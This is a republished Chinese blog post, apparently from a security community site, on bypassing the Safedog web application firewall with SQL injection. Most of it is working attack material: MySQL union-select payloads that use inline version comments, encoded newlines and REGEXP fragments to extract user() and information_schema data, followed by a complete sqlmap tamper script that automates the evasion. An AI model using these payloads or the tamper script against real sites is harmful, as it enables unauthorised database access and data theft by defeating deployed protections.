选择你喜欢的标签
我们会为你匹配适合你的网址导航

    确认 跳过

    跳过将删除所有初始化信息

    SQL注入bypass最新版安全狗

    安全 2021-11-29 14:14

    声明:该文章来自(先知社区)版权由原作者所有,K2OS渲染引擎提供网页加速服务。

    0x00:前言

    安全狗又偷偷摸摸更新了

    0x01:绕过

    之前安全狗就像没开发完一样,简单内联就过去了,但是现在的安全狗摇身一变,变得稳重了起来。

    就连报错界面都变成了大人的模样。

    看这架势,不好过啊

    首先 and 内敛注释依旧是可以过的,看来安全狗并没有太过关注and,可能是觉得后面的规则比较牛,知道有注入也没用?

    然后是order by ,从这里开始,事情就变得微妙了起来

    猜测规则是order by 组合强规则,意思就是order by中间无论加什么都过不去

    随便试一试

    果然,但是有没有发现,我fuzz的符号里没有加#号,因为加了就会这样

    由于锚点这个特殊性,盲猜这是一个突破点

    可能安全狗遇到注释也会直接截断掉后面的语句(类似某锁),那就好说了,构造个注释在语句前面即可

    居然没过,小看你了安全狗,看来order by规则还没失效,那么 尝试隔断order by

    中间加个%0a

    轻轻松松

    接下来是union select 组合

    同理,也可以这样过

    1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,2,3 --+

    下一个是user()这类函数,这里也是个坑,发现直接括号会被拦

    去一个右括号就没事了,这规则也是无语

    既然如此,在括号里下文章即可

    依然是换行加注释绕过

    -1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,user(%0a /*!80000aaa*/),3 -- +

    然后是INFORMATION_SCHEMA 这玩意,居然也被加到了规则里,

    没关系,继续构造换行注释,

    -1'  REGEXP "[…%0a%23]"    /*!11444union %0a select*/ 1,(select %0a group_concat(schema_name %0a /*80000aaa*/) %0a from %0a /*!11444 /*REGEXP "[…%0a%23]"*/ %0a information_schema.schemata*/),3-- +

    0x02:tamper

    #!/usr/bin/env python
# -*- coding: utf-8 -*-



"""
Copyright (c) 2006-2019 sqlmap developers (http:%23 %26%23 %26sqlmap.org%23 %26)
See the file 'LICENSE' for copying permission
Author:pureqh.top
"""

import re
import os

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW

def dependencies():
    singleTimeWarnMessage("Bypass safedog by pureqh'%s' only %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):

        payload=payload.replace(" ","  ",1)
        payload=payload.replace("ORDER BY","REGEXP \"[...%25%23]\"   /*!11444order %0a by*/")
        payload=payload.replace("union ALL SELECT","/*!11444union all%0a select*/")
        payload=payload.replace(" AND","/*!11444AND*/")
        payload=payload.replace("(SELECT (CASE","(/*!11444SELECT*/ %0a (CASE")
        payload=payload.replace("UNION SELECT","/*!11444union*/  /*REGEXP \"[...%25%23]\"*/  %0a select /*REGEXP \"[...%25%23]\"*/")
        payload=payload.replace("UNION ALL SELECT","REGEXP \"[...%0a%23]\" /*!11444union %0a select */ ")
        payload=payload.replace("()","(%0a /*!80000aaa*/)")
        payload=payload.replace(" AS","/*!11444AS*/")
        payload=payload.replace("FROM","/*!11444FROM*/")
        payload=payload.replace("INFORMATION_SCHEMA","/*like\"%0a%23\"*/ %0a  INFORMATION_SCHEMA")
        payload=payload.replace("INFORMATION_SCHEMA.TABLES","%0a /*!11444INFORMATION_SCHEMA.TABLES*/")

        return payload

    题外话 某锁也能这样过

    代码已更新至github

    https://github.com/pureqh/bypasswaf

    关注我们

    [超站]友情链接:

    四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
    关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/

    *文章为作者独立观点,不代表 0XUCN 立场
    本文由 女书记花瓣 发表,转载此文章须经作者同意,并请附上出处(0XUCN)及本页链接。
    原文链接 https://www.0xu.cn/article/intelnet/safe/9051.html
    SQL注入 bypass 安全狗
    图库
    百度热搜榜
    排名 热点 搜索指数
    bgame.cn
    iTrust
    AiDeep Ued
    关于我们 联系我们 网站入库 法律声明 广告服务 侵删通道
    Copyright © 2021 K2CMS All rights reserved.
    蜀ICP备17002406号